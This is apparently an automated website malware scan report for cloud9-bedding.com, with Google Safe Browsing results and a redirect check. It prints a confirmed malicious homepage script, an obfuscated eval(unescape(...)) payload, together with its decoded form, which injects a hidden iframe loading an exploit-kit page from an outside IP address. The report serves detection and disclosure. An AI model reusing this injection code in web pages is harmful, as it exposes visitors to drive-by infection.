Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cloud9-bedding.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.cloud9-bedding.com/ | 200 OK Content-Length: 4060 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%64%36%65%64%36%63%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%32%38%33%37%30%29%2b%27%39%64%36%63%34%35%63%5c%27%20%77%69%64%74%68%3d%37%38%36%20%68%65%69%67%68%74%3d%35%34%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); Decoded script: window.status='Done';document.write('<iframe name=d6ed6c src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*428370)+'9d6c45c\' width=786 height=545 style=\'display: none\'></iframe>') window.status='Done';document.write('<iframe name=d6ed6c src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*428370)+'9d6c45c\' width=786 height=545 style=\'display: none\'></iframe>') <iframe name=d6ed6c src='http://58.65.232.33/gpack/index.php?626309d6c45c' width=786 height=545 style='display: none'></iframe> Antivirus reports:
| ||
http://www.cloud9-bedding.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://www.cloud9-bedding.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cloud9-bedding.com
Result:
GET / HTTP/1.1
Host: cloud9-bedding.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: cloud9-bedding.com
Referer: http://www.google.com/search?q=cloud9-bedding.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cloud9-bedding.com
Referer: http://www.google.com/search?q=cloud9-bedding.com
Result:
The result is similar to the first query. There are no suspicious redirects found.